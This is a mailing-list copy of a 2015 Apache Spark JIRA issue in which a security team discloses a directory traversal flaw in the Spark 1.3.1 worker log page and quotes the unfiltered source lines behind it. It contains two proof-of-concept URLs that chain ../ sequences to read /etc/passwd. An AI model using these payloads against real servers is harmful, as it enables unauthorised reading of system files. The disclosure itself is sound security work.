You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@spark.apache.org by "0keeTeam (JIRA)" <ji...@apache.org> on 2015/06/03 10:32:49 UTC

[jira] [Created] (SPARK-8073) Directory traversal vulnerability

0keeTeam created SPARK-8073:
-------------------------------

             Summary: Directory traversal vulnerability
                 Key: SPARK-8073
                 URL: https://issues.apache.org/jira/browse/SPARK-8073
             Project: Spark
          Issue Type: Bug
          Components: Deploy, Spark Core, Web UI
    Affects Versions: 1.3.1
         Environment: Centos6.4
            Reporter: 0keeTeam
            Priority: Critical


We are a information security team from QIHU 360  company, China. 
We found a 0day vulnerability in spark and writing to apply for a CVE ID,Please refer to below report.  Thanks!

[Team info]
         name: 0keeTeam
         company: QIHU 360 company, China
         email: g-sec-web@360.cn

Details of the vulnerability are as follows:

{color:red}
Poc&Exp:
http://xxx.com/logPage/?appId=../../../../../../../../../../../../../../../&executorId=&logType=etc/passwd
or:
http://xxx.com/logPage/?driverId=../../../../../../../../../../../../../../../&logType=etc/passwd
{color}

*spark-1.3.1\core\src\main\scala\org\apache\spark\deploy\worker\ui\LogPage.scala : Line36:*
{quote}{color:red}// parameters get from GET are not filtered{color}
    val appId = Option(request.getParameter("appId"))
    val executorId = Option(request.getParameter("executorId"))
    val driverId = Option(request.getParameter("driverId"))
    val logType = request.getParameter("logType")
    val offset = Option(request.getParameter("offset")).map(_.toLong)
    val byteLength = Option(request.getParameter("byteLength")).map(_.toInt).getOrElse(defaultBytes)
     ........
val (logText, startByte, endByte, logLength) = getLog(logDir, logType, offset, byteLength)
{quote}
*and Line125:*
{quote}
  private def getLog(
     ........
      val files = RollingFileAppender.getSortedRolledOverFiles(logDirectory, logType)
     ........
      val logText = Utils.offsetBytes(files, startIndex, endIndex)
   {quote}

*spark-1.3.1\core\src\main\scala\org\apache\spark\util\logging\RollingFileAppender.scala :Line152:*
{quote}
  def getSortedRolledOverFiles(directory: String, activeFileName: String): 
     ........
      val file = new File(directory, activeFileName).getAbsoluteFile
     ........
{quote}





--
This message was sent by Atlassian JIRA
(v6.3.4#6332)

---------------------------------------------------------------------
To unsubscribe, e-mail: issues-unsubscribe@spark.apache.org
For additional commands, e-mail: issues-help@spark.apache.org